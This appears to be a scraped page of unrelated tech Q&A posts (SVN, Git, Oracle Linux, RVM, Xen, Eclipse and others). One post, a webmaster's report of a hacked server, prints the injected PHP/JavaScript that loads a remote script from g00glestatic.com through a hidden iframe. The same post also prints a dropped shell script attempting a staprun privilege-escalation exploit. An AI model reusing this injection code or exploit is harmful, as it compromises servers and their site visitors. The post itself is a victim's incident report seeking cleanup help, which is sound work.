        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "CHECKOUT /authtestbasic/!svn/ver/1/tags HTTP/1.1" 201 724 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "COPY /authtestbasic/!svn/bc/2/trunk HTTP/1.1" 400 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "DELETE /authtestbasic/!svn/act/f1e9dc07-fb5e-5a41-ac22-907705ef6e5e HTTP/1.1" 204 1956 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"

    You'll see that the second-to-last line contains the COPY command with the HTTP 400 response; however, there doesn't appear to be any indication as to why. Please note that, while yes this is a test repository on a test server, I am experiencing this same issue in this test setup where I have eliminated all other possible causes (mixed repository configurations, externals, etc). I have also confirmed that all files for the repository (/var/svn/authtestbasic) are owned by the Apache user www-data.
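    One way to dig further, as a sketch against the virtual host shown above: raise Apache's log verbosity so mod_dav_svn records why it rejected the COPY, then retry the tag operation and watch the error log it is configured to write.

        # in the VirtualHost above, temporarily change:
        #   LogLevel warn
        # to:
        #   LogLevel debug
        # then, on the server, retry the copy and watch:
        tail -f /var/log/apache2/svn-test_error.log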

    Read the article

  • Install Git under OSX Mavericks

    - by Jan Hancic
    I've just completed a fresh install of Mavericks. Then I went to git-scm.com, downloaded the Mac installer and installed Git from that. Now whenever I go into the terminal and type git I get this:

        xcode-select: note: no developer tools were found at '/Applications/Xcode.app', requesting install. Choose an option in the dialog to download the command line developer tools.

    I also get a dialog prompting me to install the developer tools. The Git installer installed git into /usr/local/git/bin and I've added this to my PATH, but still no dice. What am I doing wrong here? I don't want to install Xcode just so I can use git.
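    A likely explanation, as a sketch: /usr/bin/git on a fresh Mavericks install is Apple's xcode-select shim, and it wins whenever /usr/bin precedes /usr/local/git/bin in PATH. One way to check and fix the ordering:

        # put the standalone Git first and clear bash's cached lookup
        export PATH=/usr/local/git/bin:$PATH   # add this line to ~/.bash_profile
        hash -r
        which git   # should now print /usr/local/git/bin/git

    Alternatively, running xcode-select --install downloads just the command line developer tools, not the full Xcode.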

    Read the article

  • SQLBeat Podcast – Episode 5 – Kevin Kline Talks With Me About SQL, Professional Development and Book Writin’

    - by SQLBeat
    I thought I would be a ball of intimidated nerves when Kevin gladly agreed to speak with me on the podcast this past weekend. After all, he is Kevin Kline of SQL in a Nutshell fame! As it turned out, we had a comfortable and enlightening conversation on Apple MacBooks (is that what they are called?), our beginnings in the industry, the Deep South, health care initiatives and 286′s. I almost pulled the plug when Kevin started down the Oracle path though, and for a moment he looked at me as if I was serious. As always on this podcast, it is all in good fun. The picture is of Kevin and I (my shirt is mauve, not pink, by the way) at the after party for SQL Saturday 151 in Orlando, FL, where he also did a Pre-Con to a sold-out crowd of enthusiastic DBAs. I know they were enthusiastic even though I was not there, because one of the attendees was a friend of mine who went on and on and on about the content, kind of like I am doing here. So I will just stop that and let you proceed to listen. As always, I hope you enjoy, and any feedback on this or future episodes is always welcome. Download the MP3

    Read the article

  • Oracle Linux 6 DVDs Now Available

    - by sergio.leunissen
    On Sunday 6 February 2011, Oracle Linux 6 was released on the Unbreakable Linux Network for customers with an Oracle Linux support subscription. Shortly after that, the Oracle Linux 6 RPMs were made available on our public yum server. Today we published the installation DVD images on edelivery.oracle.com/linux. Oracle Linux 6 is free to download, install and use. The full release notes are here, but similar to my recent post about Oracle Linux 5.6, I wanted to highlight a few items about this release.

    Unbreakable Enterprise Kernel
    As is the case with Oracle Linux 5.6, the default installed kernel on the x86_64 platform in Oracle Linux 6 is the Unbreakable Enterprise Kernel. If you haven't already, I highly recommend you watch the replay of this webcast by Chris Mason on the performance improvements made in this kernel.

        # uname -r
        2.6.32-100.28.5.el6.x86_64

    The Unbreakable Enterprise Kernel is delivered via the package kernel-uek:

        [root@localhost ~]# yum info kernel-uek
        ...
        Installed Packages
        Name       : kernel-uek
        Arch       : x86_64
        Version    : 2.6.32
        Release    : 100.28.5.el6
        Size       : 84 M
        Repo       : installed
        From repo  : anaconda-OracleLinuxServer-201102031546.x86_64
        Summary    : The Linux kernel
        URL        : http://www.kernel.org/
        License    : GPLv2
        Description: The kernel package contains the Linux kernel (vmlinuz), the core of
                   : any Linux operating system. The kernel handles the basic functions
                   : of the operating system: memory allocation, process allocation,
                   : device input and output, etc.

    ext4 file system
    The ext4 or fourth extended filesystem replaces ext3 as the default filesystem in Oracle Linux 6.

        # mount
        /dev/mapper/VolGroup-lv_root on / type ext4 (rw)
        proc on /proc type proc (rw)
        sysfs on /sys type sysfs (rw)
        devpts on /dev/pts type devpts (rw,gid=5,mode=620)
        tmpfs on /dev/shm type tmpfs (rw,rootcontext="system_u:object_r:tmpfs_t:s0")
        /dev/sda1 on /boot type ext4 (rw)
        none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

    Red Hat compatible kernel
    Oracle Linux 6 also includes a Red Hat compatible kernel built directly from RHEL source. It's already installed, so booting it is a matter of editing /etc/grub.conf.

        # rpm -qa | grep kernel-2.6.32
        kernel-2.6.32-71.el6.x86_64

    Oracle Linux 6 no longer includes a Red Hat compatible kernel with Oracle bug fixes. The only Red Hat compatible kernel included is the one built directly from RHEL source.

    Yum-only access to Unbreakable Linux Network (ULN)
    Oracle Linux 6 uses yum exclusively for access to the Unbreakable Linux Network. To register your system with ULN, use the following command:

        # uln_register

    No Itanium Support
    Oracle Linux 6 is not supported on the Itanium (ia64) platform.

    Next Steps
    - Read the release notes
    - Download Oracle Linux 6 for free
    - Discuss on the Oracle Linux forum

    Read the article

  • error while running ruby application at system startup in ubuntu

    - by anjo
    I am on an Ubuntu 12.04 machine. I have a script file which runs when entered manually in a terminal:

        gnome-terminal -e /home/precise/Desktop/cartodb/script.sh

    The content of the script file is:

        cd /home/ubuntupc/Desktop/cartodb20/
        sh /home/ubuntupc/.rvm/scripts/rvm
        bundle exec foreman start -p 3000

    So what I tried to do is run this script at every system startup. In Startup Applications I added the command:

        gnome-terminal -e /home/precise/Desktop/cartodb/script.sh

    In the terminal, under Edit - Profile Preferences - Title and Command, I checked "Run command as a login shell". But this seems to be not working. When I restarted the machine I found these errors in the terminal:

        The child process exited normally with status 127.
        ERROR: RVM Ruby not used, run `rvm use ruby` first.

    Some info regarding the installed packages and system:

        $ which ruby
        /home/ubuntupc/.rvm/rubies/ruby-1.9.2-p320/bin/ruby
        $ which rails
        /home/ubuntupc/.rvm/gems/ruby-1.9.2-p320/bin/rails
        $ which gem
        /home/ubuntupc/.rvm/rubies/ruby-1.9.2-p320/bin/gem

        $ cat ~/.bash_profile
        [[ -s "$HOME/.profile" ]] && source "$HOME/.profile" # Load the default .profile
        [[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm" # Load RVM into a shell session *as a function*

        $ which -a ruby
        /home/ubuntupc/.rvm/rubies/ruby-1.9.2-p320/bin/ruby

        $ sudo update-alternatives --config ruby
        update-alternatives: error: no alternatives for ruby.

        $ sudo find / -name "rubygems" -print
        /home/ubuntupc/.rvm/rubies/ruby-1.9.2-p320/lib/ruby/site_ruby/1.9.1/rubygems
        /home/ubuntupc/.rvm/rubies/ruby-1.9.2-p320/lib/ruby/1.9.1/rubygems
        /home/ubuntupc/.rvm/src/ruby-1.9.2-p320/lib/rubygems
        /home/ubuntupc/.rvm/src/ruby-1.9.2-p320/test/rubygems
        /home/ubuntupc/.rvm/src/ruby-1.9.2-p320/test/rubygems/rubygems
        /home/ubuntupc/.rvm/src/ruby-1.9.2-p320/doc/rubygems
        /home/ubuntupc/.rvm/src/rubygems-2.2.1/lib/rubygems
        /home/ubuntupc/.rvm/src/rubygems-2.2.1/test/rubygems
        /home/ubuntupc/.rvm/src/rubygems-2.2.1/test/rubygems/rubygems
        /home/ubuntupc/.rvm/src/rvm/scripts/functions/rubygems
        /home/ubuntupc/.rvm/src/rvm/scripts/rubygems
        /home/ubuntupc/.rvm/scripts/functions/rubygems
        /home/ubuntupc/.rvm/scripts/rubygems
        /usr/lib/ruby/1.9.1/rubygems
        /usr/local/rvm/rubies/ruby-1.9.2-p320/lib/ruby/site_ruby/1.9.1/rubygems
        /usr/local/rvm/rubies/ruby-1.9.2-p320/lib/ruby/1.9.1/rubygems
        /usr/local/rvm/src/ruby-1.9.2-p320/lib/rubygems
        /usr/local/rvm/src/ruby-1.9.2-p320/test/rubygems
        /usr/local/rvm/src/ruby-1.9.2-p320/test/rubygems/rubygems
        /usr/local/rvm/src/ruby-1.9.2-p320/doc/rubygems
        /usr/local/rvm/src/rubygems-2.2.0/lib/rubygems
        /usr/local/rvm/src/rubygems-2.2.0/test/rubygems
        /usr/local/rvm/src/rubygems-2.2.0/test/rubygems/rubygems
        /usr/local/rvm/src/rvm/scripts/functions/rubygems
        /usr/local/rvm/src/rvm/scripts/rubygems
        /usr/local/rvm/scripts/functions/rubygems
        /usr/local/rvm/scripts/rubygems

    Please point out what I am missing, as I am new to Ruby applications. Thanks in advance
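    The suspect line is `sh /home/ubuntupc/.rvm/scripts/rvm`: RVM has to be sourced into the current shell, not run as a child process, or the rvm function and its Ruby never reach the script, which matches the "RVM Ruby not used" error. A sketch of a corrected script.sh, reusing the paths shown above:

        #!/bin/bash
        # load RVM as a shell function; "sh file" runs it in a throwaway subshell
        source "$HOME/.rvm/scripts/rvm"
        rvm use ruby-1.9.2-p320   # the ruby reported by `which ruby` above
        cd /home/ubuntupc/Desktop/cartodb20/
        bundle exec foreman start -p 3000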

    Read the article

  • Mass targeted malware installed - g00glestatic.com [closed]

    - by Silver89
    Possible Duplicate: My server’s been hacked EMERGENCY

    I run a webserver which over the last few days seems to have become infected with malware that tries to include content from "http://g00glestatic.com/s.js". It appears the attacker gained access to one of the user accounts (not root), made a few changes, added a few files and ran a few bash commands. These changes stuck out clearly to me because it is not a shared server and I am the only person with access, through very secure passwords.

    In .php files, this code was added:

        #9c282e# if(!$srvc_counter) {
        echo "<script type=\"text/javascript\" src=\"http://g00glestatic.com/s.js\"></script>";
        $srvc_counter = true;} #/9c282e#

    In .js files, this code was added:

        /*9c282e*/
        var _f = document.createElement('iframe'),_r = 'setAttribute';
        _f[_r]('src', 'http://g00glestatic.com/s.js');
        _f.style.position = 'absolute';_f.style.width = '10px';
        _f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1);
        _f.style.left = '-5540px';
        document.write('<div id=\'MIX_ADS\'></div>');
        document.getElementById('MIX_ADS').appendChild(_f);
        /*/9c282e*/

    The bash commands taken from .bash_history (some usernames/passwords have been subbed):

        su -c id $replacedPassword
        id; id; sudo id; replacedPassword id;
        cd /home/replacedUserId1; chmod +x .sess_28e2f1bc755ed3ca48b32fbcb55b91a7; ./.sess_28e2f1bc755ed3ca48b32fbcb55b91a7; rm /home/replacedUserId1/.sess_28e2f1bc755ed3ca48b32fbcb55b91a7; id;
        cd /home/replacedUserId1; chmod +x .sess_05ee5257fed0ac8e0f12096f4c3c0d20; ./.sess_05ee5257fed0ac8e0f12096f4c3c0d20; rm /home/replacedUserId1/.sess_05ee5257fed0ac8e0f12096f4c3c0d20; id;
        cd /home/replacedUserId1; chmod +x .sess_bfa542fc2578cce68eb373782c5689b9; ./.sess_bfa542fc2578cce68eb373782c5689b9; rm /home/replacedUserId1/.sess_bfa542fc2578cce68eb373782c5689b9; id;
        cd /home/replacedUserId1; chmod +x .sess_bfa542fc2578cce68eb373782c5689b9; ./.sess_bfa542fc2578cce68eb373782c5689b9; rm /home/replacedUserId1/.sess_bfa542fc2578cce68eb373782c5689b9; id;
        cd /home/replacedUserId1; chmod +x .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; ./.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; rm /home/replacedUserId1/.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; id;
        kill -9 $$;; kill -9 $$;; kill -9 $$;

    The above seems to move files added to the public_html to the level above? I also have all 4 of the files that were added:

        .sess_28e2f1bc755ed3ca48b32fbcb55b91a7
        .sess_05ee5257fed0ac8e0f12096f4c3c0d20
        .sess_bfa542fc2578cce68eb373782c5689b9
        .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e

    Of those four files, three are not viewable in Notepad++ and display null characters, whereas .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e consists of:

        #!/bin/sh
        export PATH=$PATH:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/bin;
        export LC_ALL=en_US.UTF-8 LC_COLLATE=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 LANG=en_US.UTF-8 LANGUAGE=en_US.UTF-8
        export TERM=linux
        echo -n "-> checking staprun: ";
        if which staprun 2>&1 | grep -q "no $1"; then
            flag=1
        elif [ -z "`which $1 2>&1`" ]; then
            flag=1;
        fi
        if [ "$flag" = "1" ]; then
            echo "no staprun, exiting";
            exit;
        else
            echo "found";
            echo "-> trying to exploit... ";
            printf "install uprobes /bin/sh" > ololo.conf;
            MODPROBE_OPTIONS="-C ololo.conf" staprun -u ololo
            rm -f ololo.conf
        fi

    Other Noticeable Edits
    Any files that contain ([.htaccess]|[index|header|footer].php|[*.js]) will have been modified, and all system file and directory permissions will have been changed to: x--x--x

    My steps to remove this malware:
    - Re-uploaded original php/js files to revert any changes
    - Changed all user passwords
    - Modified hosts.allow to a static IP so that only I have access
    - Removed the above 4 files and checked all modified file dates within that directory to check for any other recent modifications; none can be found

    Conclusion
    I'm hoping that as they did not have root access, any changes they wished to make higher up failed and they were only able to display an iframe on the site for a short amount of time? What else do I need to look for to check the malware infection has not spread?

    Second Conclusion
    This malware sinks too deep to 'clean'; if you get infected I recommend a server nuke and rebuild from backups with increased security.

    Possibility
    It's possible that FileZilla FTP passwords were stolen through a trojan, as they're unfortunately stored unencrypted. However, Trend Micro Titanium has not found any. The settings box to disable passwords being saved has now been ticked; I also recommend that you take this action.

    Read the article

  • Running sfc /scannow provides the error "The specific error code is 0x000006ba [The RPC server is unavailable]"

    - by leeand00
    I think that my mup.sys file is corrupted. I received the following error when trying to access a network share that was located on my Windows 7 box, from my Windows XP box:

        No network provider accepted the given network path.

    After reading this I attempted to follow the directions by entering my computer into safe mode. After I run "sfc /scannow" I receive the following error message:

        The specific error code is 0x000006ba [The RPC server is unavailable].

    Additionally, when I go into Services, it says that the Remote Procedure Call (RPC) service is running but that the Remote Procedure Call (RPC) Locator is not running. When I try to start the Remote Procedure Call (RPC) Locator, it gives me an error saying:

        Error 1084: This service cannot be started in Safe Mode

    So what can I do about this exactly, if it can't find the Remote Procedure Call service in safe mode?

    Read the article

  • Upgrading from Vista Home Basic to Vista Business

    - by miracle2k
    I have a PC that came with Vista Home Basic, and I now have some need for Remote Desktop, which is not included in Home Basic, so I'd like to upgrade. Now, there is apparently some hack to get Remote Desktop working in Home Premium, and obviously it's in Ultimate, but really, the Business edition would be the best fit for us. Unfortunately, Windows Anytime Upgrade does not provide a path from Home Basic to Business. My question is: if I were to buy a standalone Vista Business license, could I use it to do an upgrade from my current Home Basic installation? Would it simply be a matter of entering the new license key?

    Read the article

  • Cannot find one or more components. Please reinstall application

    - by Chris
    I am running Windows 8, 64-bit, and have SQL Server 2012 installed. I downloaded the client tools, looked in the directory for SQL Server Management Studio, and see it's there. When I try to run SQL Server Management Studio I receive the error message: "Cannot find one or more components. Please reinstall application". This problem just started. I have reinstalled the application and downloaded the service packs. The shortcut shows the path, but it still will not run.

    Read the article

  • Eclipse says "Access Denied" when running javaw and how to fix it?

    - by Eduardo de Luna
    I'm trying to get Eclipse to compile and run a HelloWorld class but it can't even do that. I have installed Eclipse x86 SDK 4.2.0, together with the latest JRE and JDK, both 64-bit. I also have the PATH variables set to respond to command prompts. When I try to run the following code:

        class HelloWorld {
            public static void main(String[] args) {
                System.out.println("Hello World!");
            }
        }

    it returns the following error:

        Exception occurred executing command line.
        Cannot run program "C:\Program Files\Java\jre7\bin\javaw.exe"
        (in directory "C:\Users\Default\workspace\devs"):
        CreateProcess error=5, Access is denied.

    Can you help me fix this? Thanks!

    Read the article

  • CodeIt.Right Code File Header Template For StyleCop Rules

    - by Paulo Morgado
    I like to use both StyleCop and CodeIt.Right to validate my code – StyleCop because it’s free and CodeIt.Right because it’s really good. While StyleCop provides only validation, CodeIt.Right provides both validation and correction of violations. Unfortunately, CodeIt.Right’s supplied template for code file headers does not conform to StyleCop rules. Fortunately, CodeIt.Right allows us to define our own template. Here’s the one I use:

        <#@ template language="C#" #>
        //-----------------------------------------------------------------------
        // <copyright file="<#= System.IO.Path.GetFileName(Context.DestinationFile) #>"
        //            project="<#= Context.ProjectName #>"
        //            assembly="<#= Context.AssemblyName #>"
        //            solution="<#= Context.SolutionName #>"
        //            company="<#= Context.GetGlobalProperty("CompanyName") #>">
        //     Copyright (c) <#= Context.GetGlobalProperty("CompanyName") #>. All rights reserved.
        // </copyright>
        // <author id="<#= Context.GetGlobalProperty("UserID") #>"><#= Context.GetGlobalProperty("UserName") #></author>
        // <summary></summary>
        //-----------------------------------------------------------------------

    Read the article

  • Unable to install Google Chrome

    - by Jordan
    I receive errors in my terminal when I try to install Chrome. Using:

        wget https://dl.google.com/linux/direct/google-chrome-stable_current_i386.deb
        sudo dpkg -i google-chrome*

    or:

        sudo dpkg --install /Path/to/chrome.deb

    I receive:

        Selecting previously unselected package google-chrome-stable.
        (Reading database ... 146911 files and directories currently installed.)
        Unpacking google-chrome-stable (from google-chrome-stable_current_i386.deb) ...
        dpkg: dependency problems prevent configuration of google-chrome-stable:
         google-chrome-stable depends on xdg-utils (>= 1.0.2).
        dpkg: error processing google-chrome-stable (--install):
         dependency problems - leaving unconfigured
        Processing triggers for man-db ...
        Processing triggers for bamfdaemon ...
        Rebuilding /usr/share/applications/bamf.index...
        Processing triggers for desktop-file-utils ...
        Processing triggers for gnome-menus ...
        Errors were encountered while processing:
         google-chrome-stable

    I then type:

        sudo apt-get install -f

    and retry the installation, though it still does not install and I receive the same errors. I have also tried using:

        sudo apt-get install libxss1 libnspr4-0d libcurl3

    though the above doesn't work either.
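    Note that the dpkg output names the unmet dependency explicitly: xdg-utils. A sketch of resolving it directly and then retrying the package:

        # install the missing dependency, then reinstall the downloaded .deb
        sudo apt-get install xdg-utils
        sudo dpkg -i google-chrome-stable_current_i386.deb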

    Read the article

  • Downloading a file over HTTP the SSIS way

    This post shows you how to download files from a web site whilst really making the most of the SSIS objects that are available. There is no task to do this, so we have to use the Script Task and some simple VB.NET or C# (if you have SQL Server 2008) code. Very often I see suggestions about how to use the .NET class System.Net.WebClient, and of course this works; you can code pretty much anything you like in .NET. Here I’d just like to raise the profile of an alternative. This approach uses the HTTP Connection Manager, one of the stock connection managers, so you can use configurations and property expressions in the same way you would for all other connections. Settings like the security details that you would want to make configurable already are, but if you take the .NET route you have to write quite a lot of code to manage those values via package variables. Using the connection manager we get all of that flexibility for free. The screenshot below illustrates some of the options we have.

    Using the HttpClientConnection class makes for much simpler code as well. I have demonstrated two methods: DownloadFile, which just downloads a file to disk, and DownloadData, which downloads the file and retains it in memory. In each case we show a message box to note the completion of the download. You can download a sample package below, but first the code:

        Imports System
        Imports System.IO
        Imports System.Text
        Imports System.Windows.Forms
        Imports Microsoft.SqlServer.Dts.Runtime

        Public Class ScriptMain

            Public Sub Main()
                ' Get the unmanaged connection object, from the connection manager called "HTTP Connection Manager"
                Dim nativeObject As Object = Dts.Connections("HTTP Connection Manager").AcquireConnection(Nothing)

                ' Create a new HTTP client connection
                Dim connection As New HttpClientConnection(nativeObject)

                ' Download the file #1
                ' Save the file from the connection manager to the local path specified
                Dim filename As String = "C:\Temp\Sample.txt"
                connection.DownloadFile(filename, True)

                ' Confirm file is there
                If File.Exists(filename) Then
                    MessageBox.Show(String.Format("File {0} has been downloaded.", filename))
                End If

                ' Download the file #2
                ' Read the text file straight into memory
                Dim buffer As Byte() = connection.DownloadData()
                Dim data As String = Encoding.ASCII.GetString(buffer)

                ' Display the file contents
                MessageBox.Show(data)

                Dts.TaskResult = Dts.Results.Success
            End Sub

        End Class

    Sample Package: HTTPDownload.dtsx (74KB)

    Read the article

  • SOLVED: Bootloader isn't executable booting Xen PV guest with virt-manager

    - by user2284355
    I am going insane with an error I am encountering while trying to install a PV guest of Debian Wheezy on an Ubuntu Server Precise Xen default build with libvirt. The steps I take with virt-manager are the following:

    1. Net install via: http://ftp.es.debian.org/debian/dists/stable/main/installer-amd64/
    2. Install process is flawless, installed via VNC over virt-manager
    3. When the VM starts I get the following error:

        Error starting domain: POST operation failed: xend_post: error from xen daemon: (xend.err "Bootloader isn't executable")

    Most answers I have found on Google say that I need to edit the VM's .cfg file and correct the path to pygrub, but virt-manager does not seem to create this file (I have searched the entire drive with "find"). Another detail is that virsh list --all shows no VMs (not even dom0), while the command xm list shows all of them. Any help is much appreciated.

    EDIT: Connected remotely via virsh:

        virsh -c xen+ssh://user@ip dumpxml vmname

    Found the line referencing /usr/bin/pygrub, then:

        ln -s /usr/lib/xen-4.1/bin/pygrub /usr/bin/pygrub

    Now it works. If anyone can think of a better solution, give me a shout. Cheers

    Read the article
